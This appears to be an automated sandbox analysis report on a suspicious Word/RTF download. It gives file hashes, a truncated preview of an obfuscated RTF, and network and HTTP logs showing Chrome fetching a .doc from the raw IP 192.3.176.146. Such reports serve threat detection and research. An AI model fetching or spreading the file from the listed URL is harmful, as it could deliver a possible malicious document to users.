                                                                                                                                                              Preview:{\rtf1..........{\*\adjust8Value639860506 \_}.{\234396691?_?[+,>%~>7/?:?=)=':8:-?-;*.%2%|5%?$=$75_8',.5)?6?`9:,![*0?+!^^/?9?~:[_=.2810|:)_-`.]_08/~;:`378&%@7!.+4^2`605<2+~#.?=?.+@9:6~8..-3[]?^:%?[-^@+%0_`.%&,%>;_>~).)~:/2.4?3@|;_#_|4*+9_.)^~7@9?@|&5?.5,`^;^)%#6*?672?[$%-+?#61538![6?^/?||..@?!='334*.&%%2]0.&3`5<1?:|?88#?:<3,??32?[#3;&039?065/0[~.4:_#^1>8-,@?-04~^~<907[^7|.<>#3]|@`?^/.?7'>##/5_`@(2??`|+?=`:.?7:????_%.2:?)@%]$+?$8)?05?(!/4:.&~>?.?'77.[6?#;['[%%_/72)(!37|~53+9<)?2??-%)0<|*?[?3<(?`7.;?&?'];?],=.3_);#...:=%8%.-.|'._5::<#8#>*.5?$?/$<^-?6*<*]<$?_+~$:[??!'067@.&.080?=_?3.&^:51|1?!1%%<`.`#?5)|=41.,.?_*.66.-/>;??^|2$;,)!.365..^_.~??@&-%-~0^?.:7!;__/@.]@#!'`.50^??&%47#11'=))$=8?~,`.91.~262=$=15?8..$_#)82.|==869?67?>#)0%?27#??~[,+?=.8?1%,./@])23&)0.%6'-9?..&3%,.:#|0?`,#$+<0_&~;'../+'0,,%,:-1&`]02*$|]2~5?1@$^`-((>`%=4/_=?3??1(`;7[2@(5;:1/0=?#25/'9?+.`<)='|%@%=*~.&)%|01,|_-?$,[].2'?()(.<('/_2&1,5%.%3%50~?.:0|4.$2]%.--&#~821#:!%`9):4+.4%?)&2>?$>8&7?[1.%%.>.,749~!./!|*%?!:(7<<).$)!]$90
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Rich Text Format data, version 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):23389
                                                                                                                                                              Entropy (8bit):4.252845509983804
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:kz6mmMVuOpyEiI8XnKevWuykFZKjwiise2RuWEd+RLKoCwvnliuEjTUVbS5JH/0t:k5VAOpmI8XnCuVwwr72YWpRLKoCwvnl/
                                                                                                                                                              MD5:F5879C1BE334D16E12D50DB0FD3C233F
                                                                                                                                                              SHA1:6993EC206A042739FC89D7C001A855E10F3946BD
                                                                                                                                                              SHA-256:16447F7E27DE852783027404F8CCF368ECF8E1EADD47F8E080E6E4819D2203B0
                                                                                                                                                              SHA-512:F199E090686BDEB1FE3DE27EEC4E3D83D5ECE18963EF33CE3D03D0A64C9E101E10E41BFAF3FA4127171A699671ABA455A3377741166724F2FC4D9201B70EED7D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:{\rtf1..........{\*\adjust8Value639860506 \_}.{\234396691?_?[+,>%~>7/?:?=)=':8:-?-;*.%2%|5%?$=$75_8',.5)?6?`9:,![*0?+!^^/?9?~:[_=.2810|:)_-`.]_08/~;:`378&%@7!.+4^2`605<2+~#.?=?.+@9:6~8..-3[]?^:%?[-^@+%0_`.%&,%>;_>~).)~:/2.4?3@|;_#_|4*+9_.)^~7@9?@|&5?.5,`^;^)%#6*?672?[$%-+?#61538![6?^/?||..@?!='334*.&%%2]0.&3`5<1?:|?88#?:<3,??32?[#3;&039?065/0[~.4:_#^1>8-,@?-04~^~<907[^7|.<>#3]|@`?^/.?7'>##/5_`@(2??`|+?=`:.?7:????_%.2:?)@%]$+?$8)?05?(!/4:.&~>?.?'77.[6?#;['[%%_/72)(!37|~53+9<)?2??-%)0<|*?[?3<(?`7.;?&?'];?],=.3_);#...:=%8%.-.|'._5::<#8#>*.5?$?/$<^-?6*<*]<$?_+~$:[??!'067@.&.080?=_?3.&^:51|1?!1%%<`.`#?5)|=41.,.?_*.66.-/>;??^|2$;,)!.365..^_.~??@&-%-~0^?.:7!;__/@.]@#!'`.50^??&%47#11'=))$=8?~,`.91.~262=$=15?8..$_#)82.|==869?67?>#)0%?27#??~[,+?=.8?1%,./@])23&)0.%6'-9?..&3%,.:#|0?`,#$+<0_&~;'../+'0,,%,:-1&`]02*$|]2~5?1@$^`-((>`%=4/_=?3??1(`;7[2@(5;:1/0=?#25/'9?+.`<)='|%@%=*~.&)%|01,|_-?$,[].2'?()(.<('/_2&1,5%.%3%50~?.:0|4.$2]%.--&#~821#:!%`9):4+.4%?)&2>?$>8&7?[1.%%.>.,749~!./!|*%?!:(7<<).$)!]$90
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Rich Text Format data, version 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):23389
                                                                                                                                                              Entropy (8bit):4.252845509983804
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:kz6mmMVuOpyEiI8XnKevWuykFZKjwiise2RuWEd+RLKoCwvnliuEjTUVbS5JH/0t:k5VAOpmI8XnCuVwwr72YWpRLKoCwvnl/
                                                                                                                                                              MD5:F5879C1BE334D16E12D50DB0FD3C233F
                                                                                                                                                              SHA1:6993EC206A042739FC89D7C001A855E10F3946BD
                                                                                                                                                              SHA-256:16447F7E27DE852783027404F8CCF368ECF8E1EADD47F8E080E6E4819D2203B0
                                                                                                                                                              SHA-512:F199E090686BDEB1FE3DE27EEC4E3D83D5ECE18963EF33CE3D03D0A64C9E101E10E41BFAF3FA4127171A699671ABA455A3377741166724F2FC4D9201B70EED7D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:{\rtf1..........{\*\adjust8Value639860506 \_}.{\234396691?_?[+,>%~>7/?:?=)=':8:-?-;*.%2%|5%?$=$75_8',.5)?6?`9:,![*0?+!^^/?9?~:[_=.2810|:)_-`.]_08/~;:`378&%@7!.+4^2`605<2+~#.?=?.+@9:6~8..-3[]?^:%?[-^@+%0_`.%&,%>;_>~).)~:/2.4?3@|;_#_|4*+9_.)^~7@9?@|&5?.5,`^;^)%#6*?672?[$%-+?#61538![6?^/?||..@?!='334*.&%%2]0.&3`5<1?:|?88#?:<3,??32?[#3;&039?065/0[~.4:_#^1>8-,@?-04~^~<907[^7|.<>#3]|@`?^/.?7'>##/5_`@(2??`|+?=`:.?7:????_%.2:?)@%]$+?$8)?05?(!/4:.&~>?.?'77.[6?#;['[%%_/72)(!37|~53+9<)?2??-%)0<|*?[?3<(?`7.;?&?'];?],=.3_);#...:=%8%.-.|'._5::<#8#>*.5?$?/$<^-?6*<*]<$?_+~$:[??!'067@.&.080?=_?3.&^:51|1?!1%%<`.`#?5)|=41.,.?_*.66.-/>;??^|2$;,)!.365..^_.~??@&-%-~0^?.:7!;__/@.]@#!'`.50^??&%47#11'=))$=8?~,`.91.~262=$=15?8..$_#)82.|==869?67?>#)0%?27#??~[,+?=.8?1%,./@])23&)0.%6'-9?..&3%,.:#|0?`,#$+<0_&~;'../+'0,,%,:-1&`]02*$|]2~5?1@$^`-((>`%=4/_=?3??1(`;7[2@(5;:1/0=?#25/'9?+.`<)='|%@%=*~.&)%|01,|_-?$,[].2'?()(.<('/_2&1,5%.%3%50~?.:0|4.$2]%.--&#~821#:!%`9):4+.4%?)&2>?$>8&7?[1.%%.>.,749~!./!|*%?!:(7<<).$)!]$90
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):162
                                                                                                                                                              Entropy (8bit):2.5545952465522173
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Rl/ZdMnM/WhdlzeuRBKwytO7U/Z:RtZaLaw57+
                                                                                                                                                              MD5:76A7E48CC687D9E3210C10C853ECBB07
                                                                                                                                                              SHA1:00D5F9680BFDE6FE96A91C3AF1CB20242373A2E1
                                                                                                                                                              SHA-256:11C67672A4CF19260B14E9D4C42E11FC94B8C2256A782EB19A1E19DF490CD50D
                                                                                                                                                              SHA-512:F546C86444C194C303B30B7C87C895A0B02B688014AE2778E422E685993D1B38EA898C9EE65231104D62ABC3B88A4B349BEE279DD0080FAA6A163265454D86B4
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:.pratesh................................................p.r.a.t.e.s.h.........#..x....d.x..l..................'..x.........C..scopenested.....+..x................
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Rich Text Format data, version 1
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):23389
                                                                                                                                                              Entropy (8bit):4.252845509983804
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:kz6mmMVuOpyEiI8XnKevWuykFZKjwiise2RuWEd+RLKoCwvnliuEjTUVbS5JH/0t:k5VAOpmI8XnCuVwwr72YWpRLKoCwvnl/
                                                                                                                                                              MD5:F5879C1BE334D16E12D50DB0FD3C233F
                                                                                                                                                              SHA1:6993EC206A042739FC89D7C001A855E10F3946BD
                                                                                                                                                              SHA-256:16447F7E27DE852783027404F8CCF368ECF8E1EADD47F8E080E6E4819D2203B0
                                                                                                                                                              SHA-512:F199E090686BDEB1FE3DE27EEC4E3D83D5ECE18963EF33CE3D03D0A64C9E101E10E41BFAF3FA4127171A699671ABA455A3377741166724F2FC4D9201B70EED7D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://192.3.176.146/ic/icicicicicicicicicicicicicic%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23icicicicicicicic.doc
                                                                                                                                                              Preview:{\rtf1..........{\*\adjust8Value639860506 \_}.{\234396691?_?[+,>%~>7/?:?=)=':8:-?-;*.%2%|5%?$=$75_8',.5)?6?`9:,![*0?+!^^/?9?~:[_=.2810|:)_-`.]_08/~;:`378&%@7!.+4^2`605<2+~#.?=?.+@9:6~8..-3[]?^:%?[-^@+%0_`.%&,%>;_>~).)~:/2.4?3@|;_#_|4*+9_.)^~7@9?@|&5?.5,`^;^)%#6*?672?[$%-+?#61538![6?^/?||..@?!='334*.&%%2]0.&3`5<1?:|?88#?:<3,??32?[#3;&039?065/0[~.4:_#^1>8-,@?-04~^~<907[^7|.<>#3]|@`?^/.?7'>##/5_`@(2??`|+?=`:.?7:????_%.2:?)@%]$+?$8)?05?(!/4:.&~>?.?'77.[6?#;['[%%_/72)(!37|~53+9<)?2??-%)0<|*?[?3<(?`7.;?&?'];?],=.3_);#...:=%8%.-.|'._5::<#8#>*.5?$?/$<^-?6*<*]<$?_+~$:[??!'067@.&.080?=_?3.&^:51|1?!1%%<`.`#?5)|=41.,.?_*.66.-/>;??^|2$;,)!.365..^_.~??@&-%-~0^?.:7!;__/@.]@#!'`.50^??&%47#11'=))$=8?~,`.91.~262=$=15?8..$_#)82.|==869?67?>#)0%?27#??~[,+?=.8?1%,./@])23&)0.%6'-9?..&3%,.:#|0?`,#$+<0_&~;'../+'0,,%,:-1&`]02*$|]2~5?1@$^`-((>`%=4/_=?3??1(`;7[2@(5;:1/0=?#25/'9?+.`<)='|%@%=*~.&)%|01,|_-?$,[].2'?()(.<('/_2&1,5%.%3%50~?.:0|4.$2]%.--&#~821#:!%`9):4+.4%?)&2>?$>8&7?[1.%%.>.,749~!./!|*%?!:(7<<).$)!]$90
                                                                                                                                                              No static file info
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jun 8, 2023 10:43:29.544323921 CEST49721443192.168.2.5142.250.203.109
                                                                                                                                                              Jun 8, 2023 10:43:29.544379950 CEST44349721142.250.203.109192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.544447899 CEST49721443192.168.2.5142.250.203.109
                                                                                                                                                              Jun 8, 2023 10:43:29.544847012 CEST49722443192.168.2.5142.250.203.110
                                                                                                                                                              Jun 8, 2023 10:43:29.544886112 CEST44349722142.250.203.110192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.544949055 CEST49722443192.168.2.5142.250.203.110
                                                                                                                                                              Jun 8, 2023 10:43:29.545639992 CEST49721443192.168.2.5142.250.203.109
                                                                                                                                                              Jun 8, 2023 10:43:29.545670986 CEST44349721142.250.203.109192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.545860052 CEST49722443192.168.2.5142.250.203.110
                                                                                                                                                              Jun 8, 2023 10:43:29.545887947 CEST44349722142.250.203.110192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.605287075 CEST44349722142.250.203.110192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.605685949 CEST49722443192.168.2.5142.250.203.110
                                                                                                                                                              Jun 8, 2023 10:43:29.605709076 CEST44349722142.250.203.110192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.606261015 CEST44349722142.250.203.110192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.606368065 CEST49722443192.168.2.5142.250.203.110
                                                                                                                                                              Jun 8, 2023 10:43:29.607544899 CEST44349722142.250.203.110192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.607673883 CEST49722443192.168.2.5142.250.203.110
                                                                                                                                                              Jun 8, 2023 10:43:29.609766006 CEST44349721142.250.203.109192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.610008001 CEST49721443192.168.2.5142.250.203.109
                                                                                                                                                              Jun 8, 2023 10:43:29.610038996 CEST44349721142.250.203.109192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.611772060 CEST44349721142.250.203.109192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.611876011 CEST49721443192.168.2.5142.250.203.109
                                                                                                                                                              Jun 8, 2023 10:43:29.870260954 CEST49721443192.168.2.5142.250.203.109
                                                                                                                                                              Jun 8, 2023 10:43:29.870651007 CEST49721443192.168.2.5142.250.203.109
                                                                                                                                                              Jun 8, 2023 10:43:29.870681047 CEST44349721142.250.203.109192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.870759964 CEST44349721142.250.203.109192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.870950937 CEST49722443192.168.2.5142.250.203.110
                                                                                                                                                              Jun 8, 2023 10:43:29.871062994 CEST49722443192.168.2.5142.250.203.110
                                                                                                                                                              Jun 8, 2023 10:43:29.871306896 CEST44349722142.250.203.110192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.905432940 CEST44349722142.250.203.110192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.905515909 CEST49722443192.168.2.5142.250.203.110
                                                                                                                                                              Jun 8, 2023 10:43:29.905544996 CEST44349722142.250.203.110192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.905711889 CEST44349722142.250.203.110192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.905788898 CEST49722443192.168.2.5142.250.203.110
                                                                                                                                                              Jun 8, 2023 10:43:29.906136990 CEST49722443192.168.2.5142.250.203.110
                                                                                                                                                              Jun 8, 2023 10:43:29.906160116 CEST44349722142.250.203.110192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.916589975 CEST49721443192.168.2.5142.250.203.109
                                                                                                                                                              Jun 8, 2023 10:43:29.916625977 CEST44349721142.250.203.109192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.920964003 CEST44349721142.250.203.109192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.921055079 CEST49721443192.168.2.5142.250.203.109
                                                                                                                                                              Jun 8, 2023 10:43:29.921086073 CEST44349721142.250.203.109192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.921236992 CEST44349721142.250.203.109192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.921333075 CEST49721443192.168.2.5142.250.203.109
                                                                                                                                                              Jun 8, 2023 10:43:29.925720930 CEST49721443192.168.2.5142.250.203.109
                                                                                                                                                              Jun 8, 2023 10:43:29.925760031 CEST44349721142.250.203.109192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:30.836575985 CEST4972580192.168.2.5192.3.176.146
                                                                                                                                                              Jun 8, 2023 10:43:30.836628914 CEST4972480192.168.2.5192.3.176.146
                                                                                                                                                              Jun 8, 2023 10:43:30.953507900 CEST8049724192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:30.953538895 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:30.953701019 CEST4972480192.168.2.5192.3.176.146
                                                                                                                                                              Jun 8, 2023 10:43:30.956893921 CEST4972580192.168.2.5192.3.176.146
                                                                                                                                                              Jun 8, 2023 10:43:30.957868099 CEST4972580192.168.2.5192.3.176.146
                                                                                                                                                              Jun 8, 2023 10:43:31.076966047 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.077047110 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.077092886 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.077163935 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.077213049 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.077260971 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.077306986 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.077353954 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.077404976 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.077471972 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.077708960 CEST4972580192.168.2.5192.3.176.146
                                                                                                                                                              Jun 8, 2023 10:43:31.194693089 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.194773912 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.194849968 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.194924116 CEST4972580192.168.2.5192.3.176.146
                                                                                                                                                              Jun 8, 2023 10:43:31.194945097 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.194993019 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.195003986 CEST4972580192.168.2.5192.3.176.146
                                                                                                                                                              Jun 8, 2023 10:43:31.195040941 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.195090055 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.195094109 CEST4972580192.168.2.5192.3.176.146
                                                                                                                                                              Jun 8, 2023 10:43:31.195137024 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.195182085 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:31.195190907 CEST4972580192.168.2.5192.3.176.146
                                                                                                                                                              Jun 8, 2023 10:43:31.236175060 CEST4972580192.168.2.5192.3.176.146
                                                                                                                                                              Jun 8, 2023 10:43:33.354422092 CEST49727443192.168.2.5142.250.203.100
                                                                                                                                                              Jun 8, 2023 10:43:33.354495049 CEST44349727142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:33.354598999 CEST49727443192.168.2.5142.250.203.100
                                                                                                                                                              Jun 8, 2023 10:43:33.356425047 CEST49727443192.168.2.5142.250.203.100
                                                                                                                                                              Jun 8, 2023 10:43:33.356456041 CEST44349727142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:33.416460037 CEST44349727142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:33.433438063 CEST49727443192.168.2.5142.250.203.100
                                                                                                                                                              Jun 8, 2023 10:43:33.433464050 CEST44349727142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:33.435565948 CEST44349727142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:33.435674906 CEST49727443192.168.2.5142.250.203.100
                                                                                                                                                              Jun 8, 2023 10:43:33.593324900 CEST49727443192.168.2.5142.250.203.100
                                                                                                                                                              Jun 8, 2023 10:43:33.593821049 CEST44349727142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:33.748799086 CEST49727443192.168.2.5142.250.203.100
                                                                                                                                                              Jun 8, 2023 10:43:33.748853922 CEST44349727142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:33.936288118 CEST49727443192.168.2.5142.250.203.100
                                                                                                                                                              Jun 8, 2023 10:43:36.081912041 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:36.082123995 CEST4972580192.168.2.5192.3.176.146
                                                                                                                                                              Jun 8, 2023 10:43:37.009623051 CEST4972580192.168.2.5192.3.176.146
                                                                                                                                                              Jun 8, 2023 10:43:37.126336098 CEST8049725192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:43.433640957 CEST44349727142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:43.433799982 CEST44349727142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:43.433908939 CEST49727443192.168.2.5142.250.203.100
                                                                                                                                                              Jun 8, 2023 10:43:53.794821024 CEST49727443192.168.2.5142.250.203.100
                                                                                                                                                              Jun 8, 2023 10:43:53.794863939 CEST44349727142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:44:16.139147997 CEST4972480192.168.2.5192.3.176.146
                                                                                                                                                              Jun 8, 2023 10:44:16.255793095 CEST8049724192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:44:33.393263102 CEST4972480192.168.2.5192.3.176.146
                                                                                                                                                              Jun 8, 2023 10:44:33.394107103 CEST49732443192.168.2.5142.250.203.100
                                                                                                                                                              Jun 8, 2023 10:44:33.394155979 CEST44349732142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:44:33.394320965 CEST49732443192.168.2.5142.250.203.100
                                                                                                                                                              Jun 8, 2023 10:44:33.395390987 CEST49732443192.168.2.5142.250.203.100
                                                                                                                                                              Jun 8, 2023 10:44:33.395412922 CEST44349732142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:44:33.443978071 CEST44349732142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:44:33.444696903 CEST49732443192.168.2.5142.250.203.100
                                                                                                                                                              Jun 8, 2023 10:44:33.444747925 CEST44349732142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:44:33.445259094 CEST44349732142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:44:33.446182013 CEST49732443192.168.2.5142.250.203.100
                                                                                                                                                              Jun 8, 2023 10:44:33.446321011 CEST44349732142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:44:33.498780966 CEST49732443192.168.2.5142.250.203.100
                                                                                                                                                              Jun 8, 2023 10:44:33.510158062 CEST8049724192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:44:33.510359049 CEST8049724192.3.176.146192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:44:33.510483980 CEST4972480192.168.2.5192.3.176.146
                                                                                                                                                              Jun 8, 2023 10:44:43.429486990 CEST44349732142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:44:43.429707050 CEST44349732142.250.203.100192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:44:43.429941893 CEST49732443192.168.2.5142.250.203.100
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jun 8, 2023 10:43:29.501658916 CEST6532353192.168.2.58.8.8.8
                                                                                                                                                              Jun 8, 2023 10:43:29.501811981 CEST5148453192.168.2.58.8.8.8
                                                                                                                                                              Jun 8, 2023 10:43:29.530222893 CEST53514848.8.8.8192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:29.530323982 CEST53653238.8.8.8192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:43:33.300920963 CEST5506853192.168.2.58.8.8.8
                                                                                                                                                              Jun 8, 2023 10:43:33.320801020 CEST53550688.8.8.8192.168.2.5
                                                                                                                                                              Jun 8, 2023 10:44:33.361021996 CEST6017753192.168.2.58.8.8.8
                                                                                                                                                              Jun 8, 2023 10:44:33.389441013 CEST53601778.8.8.8192.168.2.5
                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                              Jun 8, 2023 10:43:29.501658916 CEST192.168.2.58.8.8.80x4a15Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                                                                                              Jun 8, 2023 10:43:29.501811981 CEST192.168.2.58.8.8.80xef73Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                                                                                                              Jun 8, 2023 10:43:33.300920963 CEST192.168.2.58.8.8.80x1b20Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                              Jun 8, 2023 10:44:33.361021996 CEST192.168.2.58.8.8.80x4dc7Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                              Jun 8, 2023 10:43:23.522900105 CEST8.8.8.8192.168.2.50xb042No error (0)t-ring.t-9999.fdv2-t-msedge.nett-9999.fdv2-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Jun 8, 2023 10:43:23.522900105 CEST8.8.8.8192.168.2.50xb042No error (0)t-9999.fdv2-t-msedge.net13.107.237.254A (IP address)IN (0x0001)false
                                                                                                                                                              Jun 8, 2023 10:43:23.841898918 CEST8.8.8.8192.168.2.50xd260No error (0)k-ring.k-9999.k-msedge.netk-9999.k-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Jun 8, 2023 10:43:23.841898918 CEST8.8.8.8192.168.2.50xd260No error (0)k-9999.k-msedge.net13.107.18.254A (IP address)IN (0x0001)false
                                                                                                                                                              Jun 8, 2023 10:43:29.530222893 CEST8.8.8.8192.168.2.50xef73No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Jun 8, 2023 10:43:29.530222893 CEST8.8.8.8192.168.2.50xef73No error (0)clients.l.google.com142.250.203.110A (IP address)IN (0x0001)false
                                                                                                                                                              Jun 8, 2023 10:43:29.530323982 CEST8.8.8.8192.168.2.50x4a15No error (0)accounts.google.com142.250.203.109A (IP address)IN (0x0001)false
                                                                                                                                                              Jun 8, 2023 10:43:33.320801020 CEST8.8.8.8192.168.2.50x1b20No error (0)www.google.com142.250.203.100A (IP address)IN (0x0001)false
                                                                                                                                                              Jun 8, 2023 10:44:33.389441013 CEST8.8.8.8192.168.2.50x4dc7No error (0)www.google.com142.250.203.100A (IP address)IN (0x0001)false
                                                                                                                                                              • accounts.google.com
                                                                                                                                                              • clients2.google.com
                                                                                                                                                              • 192.3.176.146
                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              0192.168.2.549721142.250.203.109443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              1192.168.2.549722142.250.203.110443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              2192.168.2.549725192.3.176.14680C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Jun 8, 2023 10:43:30.957868099 CEST596OUTGET /ic/icicicicicicicicicicicicicic%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23icicicicicicicic.doc HTTP/1.1
                                                                                                                                                              Host: 192.3.176.146
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Jun 8, 2023 10:43:31.076966047 CEST598INHTTP/1.1 200 OK
                                                                                                                                                              Date: Thu, 08 Jun 2023 08:43:30 GMT
                                                                                                                                                              Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
                                                                                                                                                              Last-Modified: Tue, 06 Jun 2023 08:08:44 GMT
                                                                                                                                                              ETag: "5b5d-5fd718732c69e"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Content-Length: 23389
                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/msword
